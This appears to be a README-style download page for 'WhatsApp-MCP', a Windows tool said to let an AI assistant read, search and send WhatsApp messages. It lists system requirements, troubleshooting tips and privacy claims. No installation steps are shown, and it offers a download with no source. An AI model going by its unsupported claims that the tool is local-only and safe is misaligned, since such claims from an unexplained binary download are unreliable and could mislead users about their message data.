🤖 WhatsApp-MCP - Connect AI to WhatsApp Easily

Download WhatsApp-MCP

📋 What is WhatsApp-MCP?

WhatsApp-MCP lets you connect your WhatsApp account to an AI assistant. It uses Claude (or any MCP client) to help you read, search, and send messages on WhatsApp. The app works by bridging WhatsApp with AI through a server built on Next.js, Baileys, and FastMCP.

You don’t need to understand coding or run commands. This guide will help you download and set it up on your Windows computer step by step.

🖥️ System Requirements

Make sure your computer meets these requirements before you start:

  • Windows 10 or later (64-bit recommended)
  • At least 4 GB of free RAM
  • 500 MB of free disk space for installation and data storage
  • Internet connection for messaging and setup
  • A WhatsApp account registered on your phone

  • QR code scan fails: Make sure your phone’s camera is working and try again.
  • Messages don’t sync: Verify your internet connection on both devices.
  • App crashes: Close other running programs to free up RAM. Reinstall if the problem continues.
  • Can’t find the setup file: Refresh the releases page or try downloading on a different browser.

📂 Data and Privacy

WhatsApp-MCP only accesses your WhatsApp data through your phone’s linked device session. It does not store your messages on external servers. All communication happens locally between your computer and phone.
